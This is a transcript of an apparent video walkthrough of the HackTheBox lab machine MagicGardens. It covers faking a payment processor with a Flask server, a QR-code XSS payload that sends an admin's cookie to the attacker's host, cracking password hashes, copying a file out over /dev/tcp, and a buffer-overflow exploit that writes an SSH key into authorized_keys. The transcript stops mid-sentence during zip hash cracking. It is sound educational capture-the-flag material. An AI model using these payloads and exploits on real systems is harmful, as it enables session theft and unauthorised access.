What's going on YouTube? This is Ipsec, and we'll be doing MagicGardens from HackTheBox, which is a pretty difficult machine primarily because the foothold is extremely unique. It starts off with an online shop that has a payment processor that it sends off your requests to, but you can edit the actual processor so you can direct it to yourself. However, you can't get free things from the shop because you don't know how the payment processor responds to these requests. But you can enumerate the payment processor to figure out what fields it sends back, then make a simple web server, and this will allow you to get free things from the website. Eventually, you get a QR code, which you can manipulate to put some JavaScript code in there in order to steal an administrator's cookie, and then that leads you to a shell on the box. There's a lot of other steps, but the next big one is finding Django that's using pickle serializer, and you can get a secret key that used to encrypt the cookies, so you can make a malicious cookie and get shell on a Docker container that has the capsys module privilege, so you can load up a kernel module to get a root shell. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sc for default scripts, as v enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put in the nmap directory and call it MagicGardens, and then the IP address of 10.10.11.9. This can take some time to run, so I've already ran it. Looking at the results, we have just 4 ports open, the first one being SSH on port 22, and the banner tells us it's a Debian server. The next thing we see is SMTP, but this port is filtered, which probably just means there's an IP table rule dropping all packets to this port. It's not really that important. It's just something to keep in the back of our mind in case there's like a server-side request forgery we get on the box. We probably should take a look at why they decided to block this port in particular. The next thing we have is HTTP on port 80. The banner tells us it's Nginx, and we have the nmap script HTTP title telling us it's redirecting to magicgardens.htb. So let's go ahead and add this to a host file. So sudo v etc host. And then we can add 10.10.11.9 magicgardens.htb. And let's see what else we have. We have HTTPS listing on port 5000, and it's the Docker Registry. And the thing that sticks out to me is we have a TTL of 62. So there was an extra hop to get to this port. It's most likely this is just going to be a Docker container, and then Docker is just redirecting, or the socket on the host is forwarding to the container directly. It doesn't mean that 80 is not going to be in Docker since we see the TTL at 63. A lot of times the host OS will install Nginx and then do a proxy pass over to the container. And when Nginx is doing that proxy, or reverse proxy, I guess it's called, it doesn't decrement the TTL. So just because we're saying this is in Docker because TTL of 62 doesn't mean this can't be even though the TTL 63. It's a little bit confusing there, but hopefully it kind of makes sense. It's just how you end up doing that routing. The thing I guess to keep in mind is this Docker registry isn't behind whatever Nginx this is. So let's just go ahead and take a look at, I guess we can start off at the Docker registry. So we'll do magicgardens.htb port 5000, do HTTP, and let's see what we get. First, my burp suite is set to intercept, so we can disable that. And it wants HTTPS, so we'll do that. And we don't get anything. I want to say it's like /v2 for the Docker registry. It looks like it is. And we get username and password. And without any credentials, we can't really do anything. So let's just go ahead and take a look at the main website, which was HTTP, not HTTPS, MagicGardens. And it looks like we have some type of online shop. So the very first thing I want to do is try to like get some enumeration done on this online shop, see if I can identify what it is. And looking at the HTML, nothing is really sticking out to me just yet. Let's go ahead and take a look at like the cookie names and things like that, because we may see like PHP session ID and we don't get anything. We could go over to Wappalyzer and see what it is, and it identifies Django. I don't know exactly how it's identifying Django this quickly. There's probably something in this source. If I search for Django, I don't see it. Maybe like a JavaScript file that Django uses. I'm really not sure what Wappalyzer is doing. The way I normally enumerate Django, you could either just go to like /admin, and that's going to be the default like Django administration page. Also, it's got a unique error message. this may like not look fishy, but this is definitely a Django error message. If we look at the source, and then we can go to like OXDF error message. If we Google this, he has a nice little, I guess you can call it a cheat sheet for the default 404 pages. And you can see what each is, right? They're all kind of like nondescript. I'm going to look at Flask and Django here. But we can see what Flask looks like. We have the request. What do we have? The requested resource was not found. So Flask, a little bit more descriptive there, or more words, I guess I should say. And Django's here, and it also gives the HTML. So we know we're dealing with a Django web application. So let's see, what else do we have? If we go over here on the links, we do have a login field. So we could do forgot password. And if it was just like username, I may try to like enumerate default users like admin, but it wants emails. So maybe I'll try like admin at magicgarden.htb. We get a password reset has been sent. We're going to do something that definitely doesn't exist, and we still get the same mail. So we can't do any type of enumeration based upon forgetting passwords. And since it's going to email, we don't have email, like that's dead in the water. We could try just guessing like default credentials, but that seems iffy. So I'm going to go to create new account and just see what we have. So I'm going to do ipsec password of password. Let's do email of root at ipsec.rocks. Phone, let's do 555 555 1 2 3 4 more fives. There we go. And just put general things here. Okay. Sign up. Registration was successful. And now we can log in. And let's see, what else do we have? If we click on our name, we have some information here. Looks like we have messages. If I go to new, let's see if I can type any name. If we do like A, C, I'm seeing if it has like any type of autocomplete. We could also probably look at the network tab when we do this and see if there's any data going on, or we could use Burp Suite, right? But since it's not sending data as we type, I'm guessing there's no autocomplete to enumerate users. Let's do subscription, upgrade your subscription to get a QR code. If I click on upgrade, it wants me to put some information here. So let's just do all the defaults of what it says. And if it gives me an invalid credit card, I'd probably go and look at like the LUN algorithm to generate a normal card. That is like LUHN algorithm, I think. And all that is, it's kind of like a checksum. All the cards on a credit card aren't unique. I want to say like the last digit is the sum of a lot of these digits. And that's just to fix like typos, because when you send a credit card to a processor, it costs some money. And typos would then end up costing money, right? So they have these algorithms that just validate what you typed is an actual valid credit card. That's what the LUN algorithm's purpose is. So you don't send typos over to the credit card processor. But I digress. Let's now turn intercept on, click subscribe, and it says, please select one of these options. And it's odd. If I leave my mouse over, I can see that's plungers.htb, magicalbank.htb, and honestbank.htb. I like red, so I'm going to go with plungers.htb and click subscribe. And we can look at the request. So I'm going to send that over to the repeater tab. And we see CSRF token, session ID, some middleware. We have the bank is equal to plungers.htb, and then all my information. So the first thing I'm going to do is replace this with my IP address. So I'm going to do 10.10.14.8, and then I'm going to do sudo tcp dump -i ton 0. So now we're going to listen on the VPN. I'm going to click send. And then I'm going to look for when it talked back to me. And I should have done a -n, but this is probably it. This is the SYN. This is the first part of a handshake. We see MagicGardens.htb on this ephemeral port, talking to me on port 80, right? I'm going to do another one, and we're going to say port 8000 to see if we can control the port 2. If not, then we know we can make it talk to us on port 80. But I always like seeing if we have full control, and That is sending a lot more data. That is weird. Do I have something going on? Where is all that data coming from? I'll just Control C out of this and we'll look at the top. Let's see. Here's the SYN 10.10.11.9 on port 8000. So it looks like we can have it talk to us. And we could have just guessed. I mean, you can guess it probably talks to port 80, or if you put the port here, that it will make a connection. This probably failed because I had a paste there. There we go. Clean that up. And this is the HTTP request it's trying to make. So it's trying to talk to plungers.htb, but we have changed the bank name to be us. And we can see what it sends. It sends a post to API payments and then all this data. So what I want to do is send this data over to plungers.htb and see what its response would be. So let's do sudo v etc host. I already have one open. Plungers.htb. We're going to save that. And now I'm going to do a curl. I'm going to say -d for data. I'm going to set the header. I don't know if we have to do this if curl is smart enough, but always safe bet to set headers. I'm going to set it to application JSON. And that should be all we have to do. So let's do http plungers.htb, fix that typo, /API payments. Send this. And we get a 402 payment required IPsec. So this looks like an error message, right? I could also do a -v so we can see all the headers. And we have 402 payment required. So what I want to do is have my server respond back. And I'm going to respond back with this payload, except I'm going to change the 402 to be a 200. And 200 response is normally okay. So I'm going to put the message as okay because I can see the message here is up where the message is. So that's what I'm going to guess that has to be okay. But most of the time when you're dealing with an API, if you want to trick it, it normally only deals with status code. So the message probably isn't required, right? So let's go ahead and start making this web server. So I'm going to call this plunder because the host was plungers.htb, so this made sense. So let's start creating a Python program. I'm going to do from flask import flask, and then we want to say app is equal to flask name. This is going to start the application. Then we have to create the route, so we'll do app route, then API payments, and then this is going to accept the post method. And then we create the function. So we'll do payment. And then we need to get the data. So we'll do data request.getJSON. And we have to import this library. So this will be request. I'm also going to respond back with JSON. So I'm going to add the JSONify library as well. And if you use like Copilot or something, it'll probably automatically generate all this code for you. Let's do response is equal to, and it wants status. And I want to say it was actually a string, right? Let's see. Do I have my window here? I have to close this. Yeah, it's a string. My gut tells me it should be like an integer, which wouldn't have these quotes, but that's how the API server is coded. So that's the behavior we want to mimic. So status of 200. Then the next thing we want to put is the message. And that's just going to be okay. And then let's see. What else do we need? The card name. So we'll do card name. And this will be data card name, like this. And then it's also going to be card number. There we go. And I think that is it for this response. So we're going to return JSONify response. As long as I did not make any typos, I think that is good. We can put spaces here after the colons because I think that's what you're supposed to do. I'm going to say app.run. I'm going to put it on all IP addresses. If you don't do quad zeros, it will just default to localhost. And eventually we want the server to talk back to us, right? So we're listening. There we go. I'm going to actually do that on the bottom window so I can copy my curl and run it against both. So let's do Python 3 serve. And then we can do curl. Get rid of the -v. So that is to plungers.htb. And if I do to 127.0.0.1 port 5000, let's see. We got message status. It's kind of in the wrong order, but that definitely should not matter. Card number, card name. So this looks definitely good. So let's go ahead and fire this off. So let's change the port to be 5000. And that looks good. And right here, when we're sending it to us, we can see the location it's sending back to us is subscription and the action is error. So I'm going to hope when I send this, first we get the response and we can see we replied, but I'm hoping we don't see action is equal to error. So let's send this. We have the server reaching back to our payment and we're just directing to subscription, which is good. And it tells us we're setting a cookie. So I think the session ID is changing. I'm not sure. Let's follow redirection. And yeah, it gives us a new session ID. Let's see. I'm going to turn intercept off for a second. Let's see what the subscription page says. My subscription is being processed. Let's set our cookie and see what happens. We may also be able to like re-log into the application. Set that cookie, refresh. Subscription is still being processed. Huh. Doesn't let me redo anything. So what I'm going to do actually, let's log out. Let's make a new account. Because maybe like that error message put our account in the wrong state when we were doing like testing it out and sending things, right? So I'm going to create a second account and hopefully we can use the same email. Or we can just do root 2, I guess, just to be sure. Sign up. Registration successful. I'm going to go to Burp Suite. We're going to drop those packets. Let's log in. Let's go here. And we're going to try to upgrade. And this time we're going to do everything correctly the very first time. So ipsec. I wish it saved that output. September 2026, 3052. Okay, so let's turn intercept on. There we go. Double check we're intercepting here. We are. Subscribe. And then we're going to change the bank to be 10.10.14.8 port 5000 for that. Subscription is currently being processed. Action success. Awesome. Hold on one sec. I'm just going to go back to, maybe I didn't give it enough time. Maybe it actually takes like a minute to process, right? So I'm just going to go back. We'll do ipsec password. Let's go here. Subscription being processed. Do a full refresh. Still being processed. So this account somehow is in a hung state, but this one is better. So I don't know a good way to just enumerate that. That's kind of like a spidey sense of you do something, it looks right, it your account looks like it's in this weird limbo state, try to get on a new one, right? Because you may have done something that put your account in a weird spot. So we have a coupon now for 25% off any item, and it's this QR code. So I'm going to save the QR code. Let's go to HTB, MagicGardens, QR code. That should be fine. Save it. And then if I go back to my box, we can use a tool called zbar_image. And this is going to allow us to read QR codes. We could have also like used our phone and pointed at the screen, but this is easier, right? Let's see. We have the QR code. We got 2 hashes. I don't know exactly what these are. And then our username. So I don't know exactly how to use this QR code yet. It is for discounts. So let's try purchasing something. If I click on the store icon, let's buy this rose that I can't pronounce. Buy it. It'll be processed within 24 hours. Our manager will contact us. So if we look at this, we do have a message now. And it's Morty. So we have the first potential user of this box is Morty. Hello, thank you for the order. Please send me your QR code to get the discount. So here, my first guess is probably going to be like, we're sending him the QR code. Is it going to display the text? If it is, we could test something like cross-site scripting. And when I first did this box, I was trying to use the fetch payload and the cross-site scripting. But if we look at the responses from the server, we see the cross-origin policy is going to be same origin. So fetch isn't going to allow us to work because if we tried it, it would just fail in the browser. I guess we can do that one first and we'll do the other one so we can see it. So we're going to use a tool called QR encode. And I think this is just installed via apt. And then how do we use this tool? -o, the file name, and then I think we just put data. QR encode -o test.png data. And if I do zbar_image test.png, we get that. Awesome. So we'll do QR encode, that, and then I'm going to say this, and we're going to append data. So we'll do script, and the first one we'll do is the fetch payload. This one most likely isn't going to work, but we'll do it so you can see exactly what it looks like. We'll do 10.10.14.8, port 8000, and then we'll say fetch is equal to, do plus, B to A to base64 encode, the document.cookie, close that, close that. That looks good. /script. And I'll put this all in single quotes. We'll do zbar_image. And if the page displays this, you would think it would fetch to us. So let's do nc lvnp 8000. And we're going to send this. Let's attach our thing. That did not work. Should be MagicGardens test. Okay. So hopefully we see a response back there, but I don't think we will. So we're going to use a slightly different payload. And this one will be friendly to the cross-origin request policy because we're just going to pull an image. So it's still using the script tag. I'm going to say image is equal to new image. And then we can say the image source is equal to HTTP 10.10.14.8 port 8000. And then we'll say image is equal to, close this out, plus B2A document.cookie, like this. I think we do another semicolon and /script. And this will be, I'll call it image.png. Let's just zbar_image this. And let's see, script, image, new image, image source. That's looking good to me past the eyeball test. So let's attach this. But before we do, look at our netcat window, still nothing. Let's reply, and this will be JavaScript write image. And I'm just putting this here so when I look at the messages later, I know which one is which, right? So there we go. We have sent him 2 messages. The first one is the one using the fetch payload. The second one is with JavaScript. And let's just wait probably, we'll do 2 minutes. And while we wait, I was going to say, let's try to find a way to test this. So I'm going to do nclvmp 8001. And I'm going to copy this payload. And then I'm just going to go into my console tab. We'll paste, change this to 8001, and see if we get an error. No errors. We got it. So our JavaScript was good, and we can see we put our cookie here. So as long as that page does open, I think we're good. And there we go. We have a connection from 10.10.11.9, and we get this cookie. So let's go ahead and grab this. We can do echo-n base64-d. And the reason why I always do this is because it's going in the URL, and cookies can have some characters that aren't safe for URLs. So it's always just safer to base64 encode it, right? And here we go. We have the session. Are there periods in this? I don't know exactly how the Django session works. I wonder, let's see, is there data here? Base64-d, invalid input. I don't know. That's probably encrypted or something, and that's why we can't view it. So let's copy the session. I'm going to go over to my storage tab, and we're going to replace our session with this, refresh, and now it says, hello, Morty. So we have successfully became the Morty user. And at this point, we could probably go over to the admin page, and if he's an admin, we have Django. But what I want to do before that is show exactly how this is working. So I go to the inbox of Morty. I'm going to have my console tab up. I'm going to click on this test. And nothing happened. If I do check QR code, there we go. So here, where this digest is going to be what we put, right? And we can see in the console window, the cross origin request was blocked because of that policy. So that's why the fetch does not work. If I press F12, or I already had F12 open, let's inspect right here where this code is. We can see there's the digest, and here is the script we wrote, right? But fetch is obeying cross origin. So if we go back twice, we open up this one, and we'll probably have to listen on port 9001 again, or 8000, my bad. Let's listen here. I'm going to click check QR code. We'll go to console. And you see, we no longer get that cross origin request, and we connected. So that's why we use that image payload. You could also probably do like script and document.write, and then write directly to the document of an image. There's a lot of ways you can do it. But yeah, so let's now go ahead and check out the Django administration page. So the very first thing we look at probably is going to be the users. And if we look at the default user table for Django, we have Morty, and the password is obfuscated. We can look at the HTML source just to make sure. And in the HTML source, it confirms it's not sending us any hashes. So that is good. If we look, we have a second user thing. And if this users isn't configured correctly, it may not be censoring everything. So let's go click on Morty. And it isn't. We have the password hash right here. So in Django, if they had specified this field was a password, it probably would be censoring it or not showing it. So this is probably a vulnerability in itself, just how it's handling the password. So I'm going to go over to the Kraken, which is just another box on my network, and attempt to crack this. So we'll do cd hashcat v hashes, and I'm going to call this MagicGardens.Django, I guess. And then we can do Morty : there we go. That's the correct password hash. And let's see, we'll do /hashcat, that file, opt word list rocku.txt. And it should start cracking. And if you no hash mode matches the structure. Huh. Let's see. PBK. Oh, we probably want to specify -- user because we put the username in with the hash. So there we go. It's attempting to crack now. So this hopefully won't take too long. It says a max of 33 minutes, but chances are the password's going to be near the top of the dictionary on HackTheBox, so it doesn't take all that long. So we're just going to let this run and see if we get anything. And there we go. We have one hit, and looking up, we see the password is it : Jonas Brothers or just Jonas Brothers? Oh, probably just Jonas Brothers. That colon is the delimiter most likely. Let's try this. We'll try SSHing. So we'll do SSH Morty at 10.10.11.9. Put in Jonas Brothers, and we get logged in. So awesome. We have now got SSH over to the box. And the first thing I always like doing is trying to dump the database, right? So let's go in etc nginx. We can look at sites enabled. And what I'm doing here is looking for where the Python application is. So we can see on port 80, it is doing a proxy pass to port 8000. I'm going to do ps-ef grep 8000. And we have that going to Docker proxy. And I don't think we're a member of the Docker group, so we probably don't have access to the website source code, which means we can't access the database because we don't know the database password, so we can't dump the passwords. And then what you may be thinking, you've already got Morty's password, right? But I think Morty probably has two different passwords. We have this one, but there's also the admin password for Morty. I don't think those two are the same. So that's the password I was trying to get, right? Let's see. Y1AJU. Let's see, SSH Kraken. We can go back in, cat hashes magic garden. I don't even know what I called that. Oh, we have to go cd hashcat hashes magic garden grep y1. I'm guessing those are two different accounts, but it's a moot point since we can't get over to that source code. We also have a port 8080. And if I look at port 8080, that's also going to Docker. So let's do SSLNTP and see what we have here. We do have SMTP, so this is always a possibility. There is port leet that we did not see. It's probably because we didn't do a full port scan. So there's two things we probably should investigate. The first is going to be leet. I'm going to try accessing it. So we'll do nc -zv for connect verbose. So that way it just tells us if it connects. 10.10.11.9 port leet. And that is open to us. So that's interesting. ps-ef grep leet does not show anything. Let's do ps-ef forest and see what is running on this box. So let's see, we have Laurel, that's audit D, a bunch of cron. This is probably going to be the cross-site scripting, right? It's automating Firefox in order to hit that page to test that. Vahi, Python. So we got failed aband, so we probably can't do any type of brute forcing. Nginx. This is us on SSH. Postfix. I don't know exactly what that's doing. That's Docker. And we got something with harvest. So that's running from Alex. Let's find out exactly where this binary is, the harvest. I'm going to do find /-name harvest. That's a lot of bad characters. And I'm going to hide error messages. If I don't do the to-dev null, we just get a bunch of permission denied. So that's why I do to/dev null. So we hide all error messages, and we see harvest is in user local bin. So let's go into this directory. And then let's do a file against it. Not found. That's odd. I thought file was like a built-in. So this is going to be a elf. So let's go ahead and just download this binary. So I'll do nc lvnp 9001. We'll direct this to harvest. And then we can cat harvest over to dev tcp 10.10.14.8 9001. And since we know Morty's password, we could have just scp'd the file the correct way, but I think this is quicker. Let's do file against it. And if it was like a production thing, I definitely would do SCP because that encrypts the file in transit. Just catting this lazy way doesn't encrypt it, not good OPSEC. But now we have the file. It is a 64-bit ELF. So I'm going to open up Ghidra. Well, actually, before we do, let's actually execute it. Let's go YOLO and just see what this binary is. So we'll do chmod plus X on it. And let's see, we have the remote network analyzer. Server runs it in server mode, client mode. On server, we can probably specify a log file and interface. So let's see, harvest, client, let's do 10.10.11.9. And it connects and just outputs a bunch of information. So let's go with server mode. So we do -h. We'll say server test.log. Raw socket probably has to run with sudo. Let's run any interface. Okay. So let's open this up in Ghidra and see what we have here. So once this opens, we can file new project. Doesn't really matter the name because I don't save any of this work. Open up whatever that little dragon is. And now we can hit I to import the file. I'm going to import harvest. Do OK. Analyze. Yes. OK. Awesome. So looking at main, let's see. This is not a strip to binary, which is nice. So we can see like harvest server, harvest client, things like that. We can go down the server, listen, and see various functions. But let's see. What I'm going to do is use a Ghidra plugin to see if there's any like quick vulnerability or quick wins. So I'm going to go over to Firefox and let's go to Google. And I'm going to search for vulnerability analysis with Ghidra scripting and hope I can pull up the blog post I found earlier. I think it's this one on Medium. This was a really cool read. So I would recommend pulling this up and reading through the whole thing, but I really liked how it's all presented. They're going here, like going to ChatGPT, hey, can you generate a list of top 10 commonly exploited libc functions? For the most 3 recent years of CVE data you have access to, and it goes and finds dangerous functions like memcopy, strcpy, sprintf, strncopy, memset, read, fgets. So it creates a list of dangerous functions or things that people commonly exploit. And then they talk about how to script it in Ghidra and then also give you the program here. So we're just going to copy this and run it. So I'm going to go back in my Ghidra. Let's go to Window, Script Manager. And let's see, that's actually the script. But I'm going to create a new. Let's help. Let's see. Right click, New, Python. I'm going to call this dangercheck.py because I think that's what they called it. Home IPsec Ghidra scripts. We can just paste the code here. I'm going to also leave a comment of the URL. We will save danger check. I will search for this, enable it, and I'm going to click run script. It is running danger check. We can close this. If we look at the console scripting, we see the output and we see buffer overflows potentially here with strn copy and str copy. So if we click on the actual memory address, it'll go to where that is, or I thought it would. There we go. Let's see, we're in log packet right here. And right off the bat, this is going to be the vulnerable function. I know a lot of people think stir copy here, but that's not going to be the vulnerability. So if we look at this, it's taking local ff88, which is this, and that's going to be, we should rename these variables. It is hard to talk with like all that junk. So let's see. So at log packet, the best way to go about this, let's walk through this. We give it 2 parameters. We don't know what these parameters are. This is probably going to be a pointer to something, and this is probably data. We have local ff88-32680. Okay, so local 38, this is definitely going to be file name, right? Because we're doing fopen on that. Local 10, this is going to be file handler. So that makes sense. So local ff88, this is going to be the data we write into the file, right? We're doing fprintf. This is going to be where it gets written to, the destination, and this is the source. So ff88 is going to be data. So that's making more sense. We don't know what uvar1 is. It's doing the htons. This is probably going to be some type of length. So we have log packet, we have the length, we have data, file name, and file handler. And the odd thing here, we see 32680. It's undefined 2. So this is really going to be double the size because it's 32,680 groups of 2. I just want to do Control L to retype this, and we're going to give it a byte. And Ghidra's really like, if we can get the tooltip to show, there we go. It says the length is going to be 65,360. That's just 32,680 doubled because a byte is just a single value. So let's do that. Let's see, what was it? 65,380, I want to say. 65,360. Like that. There we go. So that's looking better. We still don't know what param2 is. It copies, this got to be file name. Right? Because we're copying the file name into this. I don't know why, but that's what it looks like we're doing, right? Destination source. So that should be file name, which means param1 is probably going to be data. And I'm guessing data is probably going to be the full packet, right? Just because we're saying log packet. But I'm going to leave it as data. So where do we get into a potential buffer overflow? Well, the strn copy is going to copy the ulong length, which is unsigned integer, over into data. And this max length is going to be unsigned 16-bit, I want to say. So this can be 65,535, which is like 200 some more than data. So we can write more data into what we're allocating here. And then the next thing on the stack is file name. So when we overflow the data, we reach file name. So if we send it more than 65,360 bytes, then we're going to start writing into file name, and it's going to then open the file name we want. So this vulnerability is a arbitrary write vulnerability, right? Because we can overflow this and then hit into file name. But what we have to do is figure out how to get to log packet, right? So if I do right click, references to log packet, let's see, this calls it. Let's see what this function is. We're in handle raw packet, and we have so much data here. Let's try to make sense of this. I'm going to guess this is going to be size. I don't know what all these variables are, so let's see if we can make sense. This looks like a MAC address, right? We have 2x, 2x, 2x with colons, so this is going to be a MAC, and this is also a MAC. I don't know what is the source, what's the destination, but that is definitely MAC addresses. So 68. I hate how it's doing this. Let's see. 222. I think these are the lower ones on the stack. So I'm guessing this is going to be the source. So we'll say source MAC, and this can be destination MAC. Right? There we go. And then this whole stack is probably going to be the packet. So let's see, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12. Let's add 12 to this and make this one big byte. Hopefully I don't screw this up. We'll do Control L. We'll say byte, and then 65,500, and I said we'll add 12, 66. See what happens. That looks better. I'm going to call this the packet. That's looking good, right? Because we're taking the source MAC and then we're saying packet, and I probably mix these up because now this is very apparent. This is the lower one. I don't know if source comes before destination. I guess we can open up Wireshark and figure that out. Let's see, what else do we have? That may be all we need. So I'm going to open up Wireshark real quick so we can step through this. But right off the bat, 45, this is going to be IPv4, 60 is IPv6. And that's part of like the TCP frame. So if we open up Wireshark, it'll be much more apparent. So let's do that. I'll do Wireshark. And then I'm going to go over, let's just do loopback. And then I'm going to do NC 127.0.0.1.80. And we can look at this. So we have Internet Protocol version 4. This is going to be where this starts. And the very first byte is going to be 45. And this is the 14th here. We have 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14. So probably 1, 2, 3, 4, 8. So this will be where we start reading from, the 45th or 14th. So that's going to be 45. If we do an IPv6, let's try this. I'm going to do if config so I get my IPv6 of loopback. Where are you? I don't have one there. I'm just going to do this because I can't remember loopback of IPv6, but we can do a local network. So we'll do nc-6, put that in, %ens, what is my interface? 33, port 80, sure. And here's IPv6. We can see at the 14th byte, it is going to be 60. So that is just logging all of that traffic. Now, what I wanted to do real quick, see, these are the lower ones. Is destination before or after source? So if I go in Wireshark, we can look at destination, source. So destination is going to be the lower number. And that's what I have. So I think we have this correct. So if we go back into Ghidra, is there anything that really we need to know? I don't think so. We could try to figure out exactly what all these variables are, but it's not important. We know if we send it IPv6 data, we can get into log packet. We're sending it the packet, and we're skipping some data maybe. Skipping 14. Okay, yeah, we're sending it the packet, and we're going to skip the frame. That's why we're going to start here, I guess. Or we're going to start here. So we're just sending it the data. So I guess I'm right in how it's labeled, right? Because in the handle packet, that's where we're dealing with the whole packet. And then when we send the packet in log packet, we're going to skip 0xe, which that'd be 15. And that's 14. So we send it the packet, but we skip 14 bytes, and that'll be the data. So now that we're here, we want to try to overflow this. So my first guess is, what is the maximum size of a TCP packet? So I'm going to go over to Google. We could do ChatGPT, but I'm not logged in. So I'm just going to do Google. Maximum size of IPv6 packet. And let's see, it is 65,535 bytes. So if we can send more than 65,360 bytes, we have an overflow. So let's try sending this data. So I'm going to go onto this box. Let's see. Actually, we're going to send it from our box, right? I'm going to kill Wireshark. Do /harvest. Client 10.10.11.9. I think you actually have to be connected to the box for it actually to log packs and things like that. So I'm just going to leave this connected. Actually, we'll do it all on a separate pane. So I have the client, we'll do harvest client 127.0.0.1 /harvest server -t. We'll call it harvest.log, and this has to be ran with sudo. Okay. So what we want to do is send it a very, very big IPv6 packet. So let's do Python 3-c print a times 65,500 and what was the max size? 35. To dump. So if I cat dump, we have all those A's. So what I'm going to do is cat dump, then we'll say nc. Do I have that nc? I probably don't. Let's do if config. We should be able to send it here and see the malicious data, right? So cat dump nc-6 port leet. It doesn't matter what port we send it to, but that's going to be open. And we have to say %ens33. And we have suspicious activity, packages have been logged. So if I do ls, let's see, we have harvest.log. It's empty. I was expecting to see all A's. I wonder if I did not send it the right way. We still don't have much. Let's do wc-c dump. And that looks good. I'm going to send it more A's. I just doubled it. So connection refused. It doesn't even send that. Harvest.log. But we don't have. Okay. So let's go over and switch to Python and see if we can do it this way, because I'm not exactly sure what netcat's doing. It may actually not be working because it's doing an SSL handshake or something, but let's just go to Python because I can be more certain exactly what we're sending on the wire. The first thing we do is import socket because we want to connect to a socket. And then after that, we want to specify the destination. And I'm just going to use the IPv6 broadcast. So we're going to send it everywhere. The port doesn't matter. I'll use quad 9s. And then We have to create the socket, and I forget all of this. Let's open this up in Visual Studio. So we have autocomplete and Copilot. That'll probably help us a little bit. So let's start this. Pwn.py. Hopefully it finishes this. See, it's discovering the interpreter. It's going to be like socket dot or like AF inet6. That's right. I don't think sock stream is right. That's going to be like TCP. Dgram. So I think socket stream requires a connection to be made where dgram is going to be more like UDP and it just writes it straight to the wire. I think that's right. And then now we have to connect. So we can connect to the destination. And destination's wrong. It should just be broadcast, but oh well. Now we can send, and I'm going to do data. I'm just going to make data right now is equal to B, A, and what was it, 65,535. I think that's the like uint 16 length. Yeah, that looks good. So let us do Python 3, pwn.py. Message is too long. 535. Let's do like that. There we go. And we get a seg fault. If I do ls now, we can see there's a list of A's. So we have overflowed the application. If I look at this, that file is also all A's because that's the data. So let's delete this file. And what we want to do is control it. So let's see exactly where this is. We can start that. And what I'm going to do is an MSF. Was it pattern create? And we want to set the length. I'm just going to do 100. If you do like 65,500, it actually starts repeating and becomes a huge pain. So that's why I'm just doing 100. We want to make sure we're always connected because if you're not connected, it's not going to log. But now we have this. Let's go back here and let's see. That's all A's. Let's go back to Ghidra. We're going to write 65,360. 360 A's. And then we're going to put this. And then I'm going to run this exploit again. Segfault. If we do ls, we have AA4. So if we look into here, this is where we overwrote. So we can probably do the MSF pattern offset. Is it -q for query? We can do the whole thing, but it looks like it's at byte 12. Doesn't even find the whole thing. That length, 100. Weird, but 12. That probably fits, right? Echo-n, WCC. Yep. So data plus equals B. This will be junk times 12. And then we have the file name. So I'll switch to double quotes. I don't know if we have to, but I know like that would be a null byte in double quotes. I'm not sure if in single quotes. So that's why I'm doing that. And then we'll call the file, please subscribe. So let's save that. We will restart this application. And hopefully we get a file that just says, please subscribe. We did not crash. We got the file. I guess because we didn't write enough to cause a huge problem. Huh. Okay. I'm fine with that. We didn't smash like the stack completely to where it would actually segfault because we didn't overwrite the variable after this, and somehow it lived. Magic. So we still have data here. So let's do that pattern again. So we'll do pattern create. I'm going to give it 256 this time. And let's see if we are at the start. So let's do data is equal to B. This. That's fine. We'll say minus the length of data. And this can be plus equals. Run this again. Cat. Or let's do less ... please subscribe. And we start. It looks like we started AA4 again, which we know is 12. That's funny. That's a pretty big coincidence. I'm guessing that's like the space of a stack or something. So we want to give it 12 bytes. So what I'm going to do is we'll do \r \n. So that's 2. We'll times it by 6. So that should be 12. And then we can put ipsec. And then we'll do like that. So I just want to see ipsec on a single line, then a bunch of A's. So that is my goal. Because if I can get this, then we can just write a SSH authorized key, right? Are we ready to please subscribe? We are. Let's delete that file. Oh, we need plus equals. So we have ipsec right here and then a bunch of junk. So now let's create a SSH key. So do SSH key gen. Is there like a -- help? There should be. I want to do ed25519 because it can be a really small key. So SSH keygen target that file name. I'm going to call this, I think Alex was running Harvester. So we'll just call it Alex. And if I look at alex.pub, this is a really small key. So I'm just going to grab this. We're going to go to pwn.py. I'm going to put this, and we'll do A at B because I think you need something in this field for the key to be valid. And that looks good. So this will be the file name. We'll do .ssh, home, Alex, SSH, authorized keys. How big is this? Can we do the full path? I think we had 40 characters space. We'll check in a second. That's going to be probably 32 because this is only 1. Please say 40. File name is 40 characters. So I think this is going to be fine. I do not mean to click that. So I'm going to copy pwn.py. We're going to put this on the server and run it. So let's see. Where do we have a shell? Here it is. cd dev shm v pwn.py. Paste this. Then we want to, wait a second. Did I just see what I thought I saw? Yeah, I guess when I didn't save pwn.py in Visual Studio and we still have old variables. That would have been bad. So let's make sure that's saved and we will replace pwn.py. There we go. And let's see. Down here, we're going to do harvest client 10.10.11.9. So we have a connection there. Then we can do python 3 pwn.py. And before we do that, let's just prove this works. So we'll go cd pwn sh-i alex at 10.10.11.9. We see that fails, so we don't have the key there. We're going to run this, and it looks like we seg faulted the server because connection is closed. And then we run it again, and there we go. We have a shell, because if we look at .ssh, authorized keys, let's actually less that. We can see we dropped a key there. Then we have a bunch of bad data, and then it ends with our junk to get us to the file name. I guess we wrote all this. I'm actually surprised. I thought we'd stop off at the A's and that's where it would end writing, but it wrote more than I expected. But anyways, we're now Alex on the box. And if I was doing this blind, I would probably run like linps at this point. However, when we first SSH'd in, there was something a little bit odd. It says we have mail. So I'm going to go and cat var_spool mail Alex, I think it is. Yep. And that's going to show us what mail we have. We could have also probably used like the mail program, but that's not installed on the box. So looking at it, we have a message here: use this file for registry configuration. The password is on your desk. And if we remember back from the beginning of the box, there was a Docker registry, and we have auth.zip. So this base64 blob is probably a zip file. So let's go ahead and copy this down to our box. So I'm going to grab that. Then we can say we'll call it auth.zip.b64, paste it, and then base64-d this file over to auth.zip, and then we can use 7-zip to extract it. And it wants a password. So I'm going to just try Jonas Brothers because that was the password of Morty. I didn't see exactly who sent that mail. If we look, I don't think, oh, that's content ID. Oh, root did. So we don't know exactly who sent it. So let's go ahead and use zip2john on the zip file, because that's going to give us a hash that we can then crack. So I'm going to copy this. I can't remember exactly everything I copy. I think just this is needed. And then let's go over to the Kraken. So I'm going to SSH back into my cracking box. And then we can go cd hashcat v MagicGardens.zip, paste this, and let's see if 